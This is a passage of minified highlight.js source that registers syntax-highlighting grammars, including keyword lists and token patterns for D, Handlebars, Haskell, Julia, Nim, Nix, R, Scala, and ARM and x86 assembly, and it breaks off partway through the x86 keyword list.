f2 f3 f4 f5 f6 f7 p0 p1 p2 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 p13 p14 p15 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 c10 c11 c12 c13 c14 c15 q0 q1 q2 q3 q4 q5 q6 q7 q8 q9 q10 q11 q12 q13 q14 q15 cpsr_c cpsr_x cpsr_s cpsr_f cpsr_cx cpsr_cxs cpsr_xs cpsr_xsf cpsr_sf cpsr_cxsf spsr_c spsr_x spsr_s spsr_f spsr_cx spsr_cxs spsr_xs spsr_xsf spsr_sf spsr_cxsf s0 s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13 s14 s15 s16 s17 s18 s19 s20 s21 s22 s23 s24 s25 s26 s27 s28 s29 s30 s31 d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 d12 d13 d14 d15 d16 d17 d18 d19 d20 d21 d22 d23 d24 d25 d26 d27 d28 d29 d30 d31 {PC} {VAR} {TRUE} {FALSE} {OPT} {CONFIG} {ENDIAN} {CODESIZE} {CPU} {FPU} {ARCHITECTURE} {PCSTOREOFFSET} {ARMASM_VERSION} {INTER} {ROPI} {RWPI} {SWST} {NOSWST} . @"},contains:[{className:"keyword",begin:"\\b(adc|(qd?|sh?|u[qh]?)?add(8|16)?|usada?8|(q|sh?|u[qh]?)?(as|sa)x|and|adrl?|sbc|rs[bc]|asr|b[lx]?|blx|bxj|cbn?z|tb[bh]|bic|bfc|bfi|[su]bfx|bkpt|cdp2?|clz|clrex|cmp|cmn|cpsi[ed]|cps|setend|dbg|dmb|dsb|eor|isb|it[te]{0,3}|lsl|lsr|ror|rrx|ldm(([id][ab])|f[ds])?|ldr((s|ex)?[bhd])?|movt?|mvn|mra|mar|mul|[us]mull|smul[bwt][bt]|smu[as]d|smmul|smmla|mla|umlaal|smlal?([wbt][bt]|d)|mls|smlsl?[ds]|smc|svc|sev|mia([bt]{2}|ph)?|mrr?c2?|mcrr2?|mrs|msr|orr|orn|pkh(tb|bt)|rbit|rev(16|sh)?|sel|[su]sat(16)?|nop|pop|push|rfe([id][ab])?|stm([id][ab])?|str(ex)?[bhd]?|(qd?)?sub|(sh?|q|u[qh]?)?sub(8|16)|[su]xt(a?h|a?b(16)?)|srs([id][ab])?|swpb?|swi|smi|tst|teq|wfe|wfi|yield)(eq|ne|cs|cc|mi|pl|vs|vc|hi|ls|ge|lt|gt|le|al|hs|lo)?[sptrx]?(?=\\s)"},e,s.QUOTE_STRING_MODE,{className:"string",begin:"'",end:"[^\\\\]'",relevance:0},{className:"title",begin:"\\|",end:"\\|",illegal:"\\n",relevance:0},{className:"number",variants:[{begin:"[#$=]?0x[0-9a-f]+"},{begin:"[#$=]?0b[01]+"},{begin:"[#$=]\\d+"},{begin:"\\b\\d+"}],relevance:0},{className:"symbol",variants:[{begin:"^[ \\t]*[a-z_\\.\\$][a-z0-9_\\.\\$]+:"},{begin:"^[a-z_\\.\\$][a-z0-9_\\.\\$]+"},{begin:"[=#]\\w+"}],relevance:0}]}}}()); +hljs.registerLanguage("d",function(){"use 
strict";return function(e){var a={$pattern:e.UNDERSCORE_IDENT_RE,keyword:"abstract alias align asm assert auto body break byte case cast catch class const continue debug default delete deprecated do else enum export extern final finally for foreach foreach_reverse|10 goto if immutable import in inout int interface invariant is lazy macro mixin module new nothrow out override package pragma private protected public pure ref return scope shared static struct super switch synchronized template this throw try typedef typeid typeof union unittest version void volatile while with __FILE__ __LINE__ __gshared|10 __thread __traits __DATE__ __EOF__ __TIME__ __TIMESTAMP__ __VENDOR__ __VERSION__",built_in:"bool cdouble cent cfloat char creal dchar delegate double dstring float function idouble ifloat ireal long real short string ubyte ucent uint ulong ushort wchar wstring",literal:"false null true"},d="((0|[1-9][\\d_]*)|0[bB][01_]+|0[xX]([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*))",n="\\\\(['\"\\?\\\\abfnrtv]|u[\\dA-Fa-f]{4}|[0-7]{1,3}|x[\\dA-Fa-f]{2}|U[\\dA-Fa-f]{8})|&[a-zA-Z\\d]{2,};",t={className:"number",begin:"\\b"+d+"(L|u|U|Lu|LU|uL|UL)?",relevance:0},_={className:"number",begin:"\\b(((0[xX](([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*)\\.([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*)|\\.?([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*))[pP][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d))|((0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)(\\.\\d*|([eE][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)))|\\d+\\.(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)|\\.(0|[1-9][\\d_]*)([eE][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d))?))([fF]|L|i|[fF]i|Li)?|"+d+"(i|[fF]i|Li))",relevance:0},r={className:"string",begin:"'("+n+"|.)",end:"'",illegal:"."},i={className:"string",begin:'"',contains:[{begin:n,relevance:0}],end:'"[cwd]?'},s=e.COMMENT("\\/\\+","\\+\\/",{contains:["self"],relevance:10});return{name:"D",keywords:a,contains:[e.C_LINE_COMMEN
T_MODE,e.C_BLOCK_COMMENT_MODE,s,{className:"string",begin:'x"[\\da-fA-F\\s\\n\\r]*"[cwd]?',relevance:10},i,{className:"string",begin:'[rq]"',end:'"[cwd]?',relevance:5},{className:"string",begin:"`",end:"`[cwd]?"},{className:"string",begin:'q"\\{',end:'\\}"'},_,t,r,{className:"meta",begin:"^#!",end:"$",relevance:5},{className:"meta",begin:"#(line)",end:"$",relevance:5},{className:"keyword",begin:"@[a-zA-Z_][a-zA-Z_\\d]*"}]}}}()); +hljs.registerLanguage("handlebars",function(){"use strict";function e(...e){return e.map(e=>(function(e){return e?"string"==typeof e?e:e.source:null})(e)).join("")}return function(n){const a={"builtin-name":"action bindattr collection component concat debugger each each-in get hash if in input link-to loc log lookup mut outlet partial query-params render template textarea unbound unless view with yield"},t=/\[.*?\]/,s=/[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+/,i=e("(",/'.*?'/,"|",/".*?"/,"|",t,"|",s,"|",/\.|\//,")+"),r=e("(",t,"|",s,")(?==)"),l={begin:i,lexemes:/[\w.\/]+/},c=n.inherit(l,{keywords:{literal:"true false undefined null"}}),o={begin:/\(/,end:/\)/},m={className:"attr",begin:r,relevance:0,starts:{begin:/=/,end:/=/,starts:{contains:[n.NUMBER_MODE,n.QUOTE_STRING_MODE,n.APOS_STRING_MODE,c,o]}}},d={contains:[n.NUMBER_MODE,n.QUOTE_STRING_MODE,n.APOS_STRING_MODE,{begin:/as\s+\|/,keywords:{keyword:"as"},end:/\|/,contains:[{begin:/\w+/}]},m,c,o],returnEnd:!0},g=n.inherit(l,{className:"name",keywords:a,starts:n.inherit(d,{end:/\)/})});o.contains=[g];const 
u=n.inherit(l,{keywords:a,className:"name",starts:n.inherit(d,{end:/}}/})}),b=n.inherit(l,{keywords:a,className:"name"}),h=n.inherit(l,{className:"name",keywords:a,starts:n.inherit(d,{end:/}}/})});return{name:"Handlebars",aliases:["hbs","html.hbs","html.handlebars","htmlbars"],case_insensitive:!0,subLanguage:"xml",contains:[{begin:/\\\{\{/,skip:!0},{begin:/\\\\(?=\{\{)/,skip:!0},n.COMMENT(/\{\{!--/,/--\}\}/),n.COMMENT(/\{\{!/,/\}\}/),{className:"template-tag",begin:/\{\{\{\{(?!\/)/,end:/\}\}\}\}/,contains:[u],starts:{end:/\{\{\{\{\//,returnEnd:!0,subLanguage:"xml"}},{className:"template-tag",begin:/\{\{\{\{\//,end:/\}\}\}\}/,contains:[b]},{className:"template-tag",begin:/\{\{#/,end:/\}\}/,contains:[u]},{className:"template-tag",begin:/\{\{(?=else\}\})/,end:/\}\}/,keywords:"else"},{className:"template-tag",begin:/\{\{\//,end:/\}\}/,contains:[b]},{className:"template-variable",begin:/\{\{\{/,end:/\}\}\}/,contains:[h]},{className:"template-variable",begin:/\{\{/,end:/\}\}/,contains:[h]}]}}}()); +hljs.registerLanguage("haskell",function(){"use strict";return function(e){var n={variants:[e.COMMENT("--","$"),e.COMMENT("{-","-}",{contains:["self"]})]},i={className:"meta",begin:"{-#",end:"#-}"},a={className:"meta",begin:"^#",end:"$"},s={className:"type",begin:"\\b[A-Z][\\w']*",relevance:0},l={begin:"\\(",end:"\\)",illegal:'"',contains:[i,a,{className:"type",begin:"\\b[A-Z][\\w]*(\\((\\.\\.|,|\\w+)\\))?"},e.inherit(e.TITLE_MODE,{begin:"[_a-z][\\w']*"}),n]};return{name:"Haskell",aliases:["hs"],keywords:"let in if then else case of where do module import hiding qualified type data newtype deriving class instance as default infix infixl infixr foreign export ccall stdcall cplusplus jvm dotnet safe unsafe family forall mdo proc rec",contains:[{beginKeywords:"module",end:"where",keywords:"module where",contains:[l,n],illegal:"\\W\\.|;"},{begin:"\\bimport\\b",end:"$",keywords:"import qualified as 
hiding",contains:[l,n],illegal:"\\W\\.|;"},{className:"class",begin:"^(\\s*)?(class|instance)\\b",end:"where",keywords:"class family instance where",contains:[s,l,n]},{className:"class",begin:"\\b(data|(new)?type)\\b",end:"$",keywords:"data family type newtype deriving",contains:[i,s,l,{begin:"{",end:"}",contains:l.contains},n]},{beginKeywords:"default",end:"$",contains:[s,l,n]},{beginKeywords:"infix infixl infixr",end:"$",contains:[e.C_NUMBER_MODE,n]},{begin:"\\bforeign\\b",end:"$",keywords:"foreign import export ccall stdcall cplusplus jvm dotnet safe unsafe",contains:[s,e.QUOTE_STRING_MODE,n]},{className:"meta",begin:"#!\\/usr\\/bin\\/env runhaskell",end:"$"},i,a,e.QUOTE_STRING_MODE,e.C_NUMBER_MODE,s,e.inherit(e.TITLE_MODE,{begin:"^[_a-z][\\w']*"}),n,{begin:"->|<-"}]}}}()); +hljs.registerLanguage("julia",function(){"use strict";return function(e){var r="[A-Za-z_\\u00A1-\\uFFFF][A-Za-z_0-9\\u00A1-\\uFFFF]*",t={$pattern:r,keyword:"in isa where baremodule begin break catch ccall const continue do else elseif end export false finally for function global if import importall let local macro module quote return true try using while type immutable abstract bitstype typealias ",literal:"true false ARGS C_NULL DevNull ENDIAN_BOM ENV I Inf Inf16 Inf32 Inf64 InsertionSort JULIA_HOME LOAD_PATH MergeSort NaN NaN16 NaN32 NaN64 PROGRAM_FILE QuickSort RoundDown RoundFromZero RoundNearest RoundNearestTiesAway RoundNearestTiesUp RoundToZero RoundUp STDERR STDIN STDOUT VERSION catalan e|0 eu|0 eulergamma golden im nothing pi γ π φ ",built_in:"ANY AbstractArray AbstractChannel AbstractFloat AbstractMatrix AbstractRNG AbstractSerializer AbstractSet AbstractSparseArray AbstractSparseMatrix AbstractSparseVector AbstractString AbstractUnitRange AbstractVecOrMat AbstractVector Any ArgumentError Array AssertionError Associative Base64DecodePipe Base64EncodePipe Bidiagonal BigFloat BigInt BitArray BitMatrix BitVector Bool BoundsError BufferStream CachingPool CapturedException 
CartesianIndex CartesianRange Cchar Cdouble Cfloat Channel Char Cint Cintmax_t Clong Clonglong ClusterManager Cmd CodeInfo Colon Complex Complex128 Complex32 Complex64 CompositeException Condition ConjArray ConjMatrix ConjVector Cptrdiff_t Cshort Csize_t Cssize_t Cstring Cuchar Cuint Cuintmax_t Culong Culonglong Cushort Cwchar_t Cwstring DataType Date DateFormat DateTime DenseArray DenseMatrix DenseVecOrMat DenseVector Diagonal Dict DimensionMismatch Dims DirectIndexString Display DivideError DomainError EOFError EachLine Enum Enumerate ErrorException Exception ExponentialBackOff Expr Factorization FileMonitor Float16 Float32 Float64 Function Future GlobalRef GotoNode HTML Hermitian IO IOBuffer IOContext IOStream IPAddr IPv4 IPv6 IndexCartesian IndexLinear IndexStyle InexactError InitError Int Int128 Int16 Int32 Int64 Int8 IntSet Integer InterruptException InvalidStateException Irrational KeyError LabelNode LinSpace LineNumberNode LoadError LowerTriangular MIME Matrix MersenneTwister Method MethodError MethodTable Module NTuple NewvarNode NullException Nullable Number ObjectIdDict OrdinalRange OutOfMemoryError OverflowError Pair ParseError PartialQuickSort PermutedDimsArray Pipe PollingFileWatcher ProcessExitedException Ptr QuoteNode RandomDevice Range RangeIndex Rational RawFD ReadOnlyMemoryError Real ReentrantLock Ref Regex RegexMatch RemoteChannel RemoteException RevString RoundingMode RowVector SSAValue SegmentationFault SerializationState Set SharedArray SharedMatrix SharedVector Signed SimpleVector Slot SlotNumber SparseMatrixCSC SparseVector StackFrame StackOverflowError StackTrace StepRange StepRangeLen StridedArray StridedMatrix StridedVecOrMat StridedVector String SubArray SubString SymTridiagonal Symbol Symmetric SystemError TCPSocket Task Text TextDisplay Timer Tridiagonal Tuple Type TypeError TypeMapEntry TypeMapLevel TypeName TypeVar TypedSlot UDPSocket UInt UInt128 UInt16 UInt32 UInt64 UInt8 UndefRefError UndefVarError UnicodeError UniformScaling 
Union UnionAll UnitRange Unsigned UpperTriangular Val Vararg VecElement VecOrMat Vector VersionNumber Void WeakKeyDict WeakRef WorkerConfig WorkerPool "},a={keywords:t,illegal:/<\//},n={className:"subst",begin:/\$\(/,end:/\)/,keywords:t},o={className:"variable",begin:"\\$"+r},i={className:"string",contains:[e.BACKSLASH_ESCAPE,n,o],variants:[{begin:/\w*"""/,end:/"""\w*/,relevance:10},{begin:/\w*"/,end:/"\w*/}]},l={className:"string",contains:[e.BACKSLASH_ESCAPE,n,o],begin:"`",end:"`"},s={className:"meta",begin:"@"+r};return a.name="Julia",a.contains=[{className:"number",begin:/(\b0x[\d_]*(\.[\d_]*)?|0x\.\d[\d_]*)p[-+]?\d+|\b0[box][a-fA-F0-9][a-fA-F0-9_]*|(\b\d[\d_]*(\.[\d_]*)?|\.\d[\d_]*)([eEfF][-+]?\d+)?/,relevance:0},{className:"string",begin:/'(.|\\[xXuU][a-zA-Z0-9]+)'/},i,l,s,{className:"comment",variants:[{begin:"#=",end:"=#",relevance:10},{begin:"#",end:"$"}]},e.HASH_COMMENT_MODE,{className:"keyword",begin:"\\b(((abstract|primitive)\\s+)type|(mutable\\s+)?struct)\\b"},{begin:/<:/}],n.contains=a.contains,a}}()); +hljs.registerLanguage("nim",function(){"use strict";return function(e){return{name:"Nim",aliases:["nim"],keywords:{keyword:"addr and as asm bind block break case cast const continue converter discard distinct div do elif else end enum except export finally for from func generic if import in include interface is isnot iterator let macro method mixin mod nil not notin object of or out proc ptr raise ref return shl shr static template try tuple type using var when while with without xor yield",literal:"shared guarded stdin stdout stderr result true false",built_in:"int int8 int16 int32 int64 uint uint8 uint16 uint32 uint64 float float32 float64 bool char string cstring pointer expr stmt void auto any range array openarray varargs seq set clong culong cchar cschar cshort cint csize clonglong cfloat cdouble clongdouble cuchar cushort cuint culonglong cstringarray 
semistatic"},contains:[{className:"meta",begin:/{\./,end:/\.}/,relevance:10},{className:"string",begin:/[a-zA-Z]\w*"/,end:/"/,contains:[{begin:/""/}]},{className:"string",begin:/([a-zA-Z]\w*)?"""/,end:/"""/},e.QUOTE_STRING_MODE,{className:"type",begin:/\b[A-Z]\w+\b/,relevance:0},{className:"number",relevance:0,variants:[{begin:/\b(0[xX][0-9a-fA-F][_0-9a-fA-F]*)('?[iIuU](8|16|32|64))?/},{begin:/\b(0o[0-7][_0-7]*)('?[iIuUfF](8|16|32|64))?/},{begin:/\b(0(b|B)[01][_01]*)('?[iIuUfF](8|16|32|64))?/},{begin:/\b(\d[_\d]*)('?[iIuUfF](8|16|32|64))?/}]},e.HASH_COMMENT_MODE]}}}()); +hljs.registerLanguage("nix",function(){"use strict";return function(e){var n={keyword:"rec with let in inherit assert if else then",literal:"true false or and null",built_in:"import abort baseNameOf dirOf isNull builtins map removeAttrs throw toString derivation"},i={className:"subst",begin:/\$\{/,end:/}/,keywords:n},t={className:"string",contains:[i],variants:[{begin:"''",end:"''"},{begin:'"',end:'"'}]},s=[e.NUMBER_MODE,e.HASH_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,t,{begin:/[a-zA-Z0-9-_]+(\s*=)/,returnBegin:!0,relevance:0,contains:[{className:"attr",begin:/\S+/}]}];return i.contains=s,{name:"Nix",aliases:["nixos"],keywords:n,contains:s}}}()); +hljs.registerLanguage("r",function(){"use strict";return function(e){var n="([a-zA-Z]|\\.[a-zA-Z.])[a-zA-Z0-9._]*";return{name:"R",contains:[e.HASH_COMMENT_MODE,{begin:n,keywords:{$pattern:n,keyword:"function if in break next repeat else for return switch while try tryCatch stop warning require library attach detach source setMethod setGeneric setGroupGeneric setClass ...",literal:"NULL NA TRUE FALSE T F Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 
NA_complex_|10"},relevance:0},{className:"number",begin:"0[xX][0-9a-fA-F]+[Li]?\\b",relevance:0},{className:"number",begin:"\\d+(?:[eE][+\\-]?\\d*)?L\\b",relevance:0},{className:"number",begin:"\\d+\\.(?!\\d)(?:i\\b)?",relevance:0},{className:"number",begin:"\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d*)?i?\\b",relevance:0},{className:"number",begin:"\\.\\d+(?:[eE][+\\-]?\\d*)?i?\\b",relevance:0},{begin:"`",end:"`",relevance:0},{className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:'"',end:'"'},{begin:"'",end:"'"}]}]}}}()); +hljs.registerLanguage("scala",function(){"use strict";return function(e){var n={className:"subst",variants:[{begin:"\\$[A-Za-z0-9_]+"},{begin:"\\${",end:"}"}]},a={className:"string",variants:[{begin:'"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:'"""',end:'"""',relevance:10},{begin:'[a-z]+"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE,n]},{className:"string",begin:'[a-z]+"""',end:'"""',contains:[n],relevance:10}]},s={className:"type",begin:"\\b[A-Z][A-Za-z0-9_]*",relevance:0},t={className:"title",begin:/[^0-9\n\t "'(),.`{}\[\]:;][^\n\t "'(),.`{}\[\]:;]+|[^0-9\n\t "'(),.`{}\[\]:;=]/,relevance:0},i={className:"class",beginKeywords:"class object trait type",end:/[:={\[\n;]/,excludeEnd:!0,contains:[{beginKeywords:"extends with",relevance:10},{begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0,relevance:0,contains:[s]},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,relevance:0,contains:[s]},t]},l={className:"function",beginKeywords:"def",end:/[:={\[(\n;]/,excludeEnd:!0,contains:[t]};return{name:"Scala",keywords:{literal:"true false null",keyword:"type yield lazy override def with val var sealed abstract private trait object if forSome for while throw finally protected extends import final return else break new catch super class case package default try this match continue throws 
implicit"},contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,{className:"symbol",begin:"'\\w[\\w\\d_]*(?!')"},s,l,i,e.C_NUMBER_MODE,{className:"meta",begin:"@[A-Za-z]+"}]}}}()); +hljs.registerLanguage("x86asm",function(){"use strict";return function(s){return{name:"Intel x86 Assembly",case_insensitive:!0,keywords:{$pattern:"[.%]?"+s.IDENT_RE,keyword:"lock rep repe repz repne repnz xaquire xrelease bnd nobnd aaa aad aam aas adc add and arpl bb0_reset bb1_reset bound bsf bsr bswap bt btc btr bts call cbw cdq cdqe clc cld cli clts cmc cmp cmpsb cmpsd cmpsq cmpsw cmpxchg cmpxchg486 cmpxchg8b cmpxchg16b cpuid cpu_read cpu_write cqo cwd cwde daa das dec div dmint emms enter equ f2xm1 fabs fadd faddp fbld fbstp fchs fclex fcmovb fcmovbe fcmove fcmovnb fcmovnbe fcmovne fcmovnu fcmovu fcom fcomi fcomip fcomp fcompp fcos fdecstp fdisi fdiv fdivp fdivr fdivrp femms feni ffree ffreep fiadd ficom ficomp fidiv fidivr fild fimul fincstp finit fist fistp fisttp fisub fisubr fld fld1 fldcw fldenv fldl2e fldl2t fldlg2 fldln2 fldpi fldz fmul fmulp fnclex fndisi fneni fninit fnop fnsave fnstcw fnstenv fnstsw fpatan fprem fprem1 fptan frndint frstor fsave fscale fsetpm fsin fsincos fsqrt fst fstcw fstenv fstp fstsw fsub fsubp fsubr fsubrp ftst fucom fucomi fucomip fucomp fucompp fxam fxch fxtract fyl2x fyl2xp1 hlt ibts icebp idiv imul in inc incbin insb insd insw int int01 int1 int03 int3 into invd invpcid invlpg invlpga iret iretd iretq iretw jcxz jecxz jrcxz jmp jmpe lahf lar lds lea leave les lfence lfs lgdt lgs lidt lldt lmsw loadall loadall286 lodsb lodsd lodsq lodsw loop loope loopne loopnz loopz lsl lss ltr mfence monitor mov movd movq movsb movsd movsq movsw movsx movsxd movzx mul mwait neg nop not or out outsb outsd outsw packssdw packsswb packuswb paddb paddd paddsb paddsiw paddsw paddusb paddusw paddw pand pandn pause paveb pavgusb pcmpeqb pcmpeqd pcmpeqw pcmpgtb pcmpgtd pcmpgtw pdistib pf2id pfacc pfadd pfcmpeq pfcmpge pfcmpgt pfmax pfmin pfmul pfrcp pfrcpit1 
pfrcpit2 pfrsqit1 pfrsqrt pfsub pfsubr pi2fd pmachriw pmaddwd pmagw pmulhriw pmulhrwa pmulhrwc pmulhw pmullw pmvgezb pmvlzb pmvnzb pmvzb pop popa popad popaw popf popfd popfq popfw por prefetch prefetchw pslld psllq psllw psrad psraw psrld psrlq psrlw psubb psubd psubsb psubsiw psubsw psubusb psubusw psubw punpckhbw punpckhdq punpckhwd punpcklbw punpckldq punpcklwd push pusha pushad pushaw pushf pushfd pushfq pushfw pxor rcl rcr rdshr rdmsr rdpmc rdtsc rdtscp ret retf retn rol ror rdm rsdc rsldt rsm rsts sahf sal salc sar sbb scasb scasd scasq scasw sfence sgdt shl shld shr shrd sidt sldt skinit smi smint smintold smsw stc std sti stosb stosd stosq stosw str sub svdc svldt svts swapgs syscall sysenter sysexit sysret test ud0 ud1 ud2b ud2 ud2a umov verr verw fwait wbinvd wrshr wrmsr xadd xbts xchg xlatb xlat xor cmove cmovz cmovne cmovnz cmova cmovnbe cmovae cmovnb cmovb cmovnae cmovbe cmovna cmovg cmovnle cmovge cmovnl cmovl cmovnge cmovle cmovng cmovc cmovnc cmovo cmovno cmovs cmovns cmovp cmovpe cmovnp cmovpo je jz jne jnz ja jnbe jae jnb jb jnae jbe jna jg jnle jge jnl jl jnge jle jng jc jnc jo jno js jns jpo jnp jpe jp sete setz setne setnz seta setnbe setae setnb setnc setb setnae setcset setbe setna setg setnle setge setnl setl setnge setle setng sets setns seto setno setpe setp setpo setnp addps addss andnps andps cmpeqps cmpeqss cmpleps cmpless cmpltps cmpltss cmpneqps cmpneqss cmpnleps cmpnless cmpnltps cmpnltss cmpordps cmpordss cmpunordps cmpunordss cmpps cmpss comiss cvtpi2ps cvtps2pi cvtsi2ss cvtss2si cvttps2pi cvttss2si divps divss ldmxcsr maxps maxss minps minss movaps movhps movlhps movlps movhlps movmskps movntps movss movups mulps mulss orps rcpps rcpss rsqrtps rsqrtss shufps sqrtps sqrtss stmxcsr subps subss ucomiss unpckhps unpcklps xorps fxrstor fxrstor64 fxsave fxsave64 xgetbv xsetbv xsave xsave64 xsaveopt xsaveopt64 xrstor xrstor64 prefetchnta prefetcht0 prefetcht1 prefetcht2 maskmovq movntq pavgb pavgw pextrw pinsrw pmaxsw pmaxub pminsw 
pminub pmovmskb pmulhuw psadbw pshufw pf2iw pfnacc pfpnacc pi2fw pswapd maskmovdqu clflush movntdq movnti movntpd movdqa movdqu movdq2q movq2dq paddq pmuludq pshufd pshufhw pshuflw pslldq psrldq psubq punpckhqdq punpcklqdq addpd addsd andnpd andpd cmpeqpd cmpeqsd cmplepd cmplesd cmpltpd cmpltsd cmpneqpd cmpneqsd cmpnlepd cmpnlesd cmpnltpd cmpnltsd cmpordpd cmpordsd cmpunordpd cmpunordsd cmppd comisd cvtdq2pd cvtdq2ps cvtpd2dq cvtpd2pi cvtpd2ps cvtpi2pd cvtps2dq cvtps2pd cvtsd2si cvtsd2ss cvtsi2sd cvtss2sd cvttpd2pi cvttpd2dq cvttps2dq cvttsd2si divpd divsd maxpd maxsd minpd minsd movapd movhpd movlpd movmskpd movupd mulpd mulsd orpd shufpd sqrtpd sqrtsd subpd subsd ucomisd unpckhpd unpcklpd xorpd addsubpd addsubps haddpd haddps hsubpd hsubps lddqu movddup movshdup movsldup clgi stgi vmcall vmclear vmfunc vmlaunch vmload vmmcall vmptrld vmptrst vmread vmresume vmrun vmsave vmwrite vmxoff vmxon invept invvpid pabsb pabsw pabsd palignr phaddw phaddd phaddsw phsubw phsubd phsubsw pmaddubsw pmulhrsw pshufb psignb psignw psignd extrq insertq movntsd movntss lzcnt blendpd blendps blendvpd blendvps dppd dpps extractps insertps movntdqa mpsadbw packusdw pblendvb pblendw pcmpeqq pextrb pextrd pextrq phminposuw pinsrb pinsrd pinsrq pmaxsb pmaxsd pmaxud pmaxuw pminsb pminsd pminud pminuw pmovsxbw pmovsxbd pmovsxbq pmovsxwd pmovsxwq pmovsxdq pmovzxbw pmovzxbd pmovzxbq pmovzxwd pmovzxwq pmovzxdq pmuldq pmulld ptest roundpd roundps roundsd roundss crc32 pcmpestri pcmpestrm pcmpistri pcmpistrm pcmpgtq popcnt getsec pfrcpv pfrsqrtv movbe aesenc aesenclast aesdec aesdeclast aesimc aeskeygenassist vaesenc vaesenclast vaesdec vaesdeclast vaesimc vaeskeygenassist vaddpd vaddps vaddsd vaddss vaddsubpd vaddsubps vandpd vandps vandnpd vandnps vblendpd vblendps vblendvpd vblendvps vbroadcastss vbroadcastsd vbroadcastf128 vcmpeq_ospd vcmpeqpd vcmplt_ospd vcmpltpd vcmple_ospd vcmplepd vcmpunord_qpd vcmpunordpd vcmpneq_uqpd vcmpneqpd vcmpnlt_uspd vcmpnltpd vcmpnle_uspd vcmpnlepd vcmpord_qpd 
vcmpordpd vcmpeq_uqpd vcmpnge_uspd vcmpngepd vcmpngt_uspd vcmpngtpd vcmpfalse_oqpd vcmpfalsepd vcmpneq_oqpd vcmpge_ospd vcmpgepd vcmpgt_ospd vcmpgtpd vcmptrue_uqpd vcmptruepd vcmplt_oqpd vcmple_oqpd vcmpunord_spd vcmpneq_uspd vcmpnlt_uqpd vcmpnle_uqpd vcmpord_spd vcmpeq_uspd vcmpnge_uqpd vcmpngt_uqpd vcmpfalse_ospd vcmpneq_ospd vcmpge_oqpd vcmpgt_oqpd vcmptrue_uspd vcmppd vcmpeq_osps vcmpeqps vcmplt_osps vcmpltps vcmple_osps vcmpleps vcmpunord_qps vcmpunordps vcmpneq_uqps vcmpneqps vcmpnlt_usps vcmpnltps vcmpnle_usps vcmpnleps vcmpord_qps vcmpordps vcmpeq_uqps vcmpnge_usps vcmpngeps vcmpngt_usps vcmpngtps vcmpfalse_oqps vcmpfalseps vcmpneq_oqps vcmpge_osps vcmpgeps vcmpgt_osps vcmpgtps vcmptrue_uqps vcmptrueps vcmplt_oqps vcmple_oqps vcmpunord_sps vcmpneq_usps vcmpnlt_uqps vcmpnle_uqps vcmpord_sps vcmpeq_usps vcmpnge_uqps vcmpngt_uqps vcmpfalse_osps vcmpneq_osps vcmpge_oqps vcmpgt_oqps vcmptrue_usps vcmpps vcmpeq_ossd vcmpeqsd vcmplt_ossd vcmpltsd vcmple_ossd vcmplesd vcmpunord_qsd vcmpunordsd vcmpneq_uqsd vcmpneqsd vcmpnlt_ussd vcmpnltsd vcmpnle_ussd vcmpnlesd vcmpord_qsd vcmpordsd vcmpeq_uqsd vcmpnge_ussd vcmpngesd vcmpngt_ussd vcmpngtsd vcmpfalse_oqsd vcmpfalsesd vcmpneq_oqsd vcmpge_ossd vcmpgesd vcmpgt_ossd vcmpgtsd vcmptrue_uqsd vcmptruesd vcmplt_oqsd vcmple_oqsd vcmpunord_ssd vcmpneq_ussd vcmpnlt_uqsd vcmpnle_uqsd vcmpord_ssd vcmpeq_ussd vcmpnge_uqsd vcmpngt_uqsd vcmpfalse_ossd vcmpneq_ossd vcmpge_oqsd vcmpgt_oqsd vcmptrue_ussd vcmpsd vcmpeq_osss vcmpeqss vcmplt_osss vcmpltss vcmple_osss vcmpless vcmpunord_qss vcmpunordss vcmpneq_uqss vcmpneqss vcmpnlt_usss vcmpnltss vcmpnle_usss vcmpnless vcmpord_qss vcmpordss vcmpeq_uqss vcmpnge_usss vcmpngess vcmpngt_usss vcmpngtss vcmpfalse_oqss vcmpfalsess vcmpneq_oqss vcmpge_osss vcmpgess vcmpgt_osss vcmpgtss vcmptrue_uqss vcmptruess vcmplt_oqss vcmple_oqss vcmpunord_sss vcmpneq_usss vcmpnlt_uqss vcmpnle_uqss vcmpord_sss vcmpeq_usss vcmpnge_uqss vcmpngt_uqss vcmpfalse_osss vcmpneq_osss vcmpge_oqss vcmpgt_oqss 
